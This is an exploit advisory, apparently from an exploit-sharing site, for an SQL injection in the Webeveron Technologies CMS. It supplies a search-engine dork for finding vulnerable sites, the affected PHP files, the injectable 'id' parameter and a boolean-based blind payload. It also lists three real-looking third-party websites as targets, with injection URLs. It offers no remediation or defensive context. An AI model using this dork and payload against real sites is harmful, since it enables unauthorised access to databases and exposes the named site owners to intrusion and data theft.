[+] Exploit Title ; Webeveron Technologies cms sql injection vulnerability
[+] Date : 2017-11-13
[+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage :http://www.webeveron.com/
[+] Dork : intext:"Powered By: Webeveron Technologies" inurl:id=
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Webeveron Technologies Is a personal content management
[+] Poc :
[+] Security Level :
[!] High
[+] Exploitation Technique:
[!] Remote
[+] web application technology: Nginx
[+] back-end DBMS: MySQL >= 5.0.12
[+] Vulnerability Files :
[*] view.php
[*] products.php
[*] collection.php
[+] Parameter: id (GET)
[*]Type: boolean-based blind
[*]Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
[*]Payload: id=-1149 OR 3413=3413#
[+] Target :
[!] http://www.rprdesigns.net/collection.php?id=Lace%20Embroidery%27
[!] http://www.eleganceinterio.com/products.php?id=13%27
[!] http://www.travelmint.in/view.php?id=14%27
[+] We Are : Mehrdad_ice [#] 0P3N3R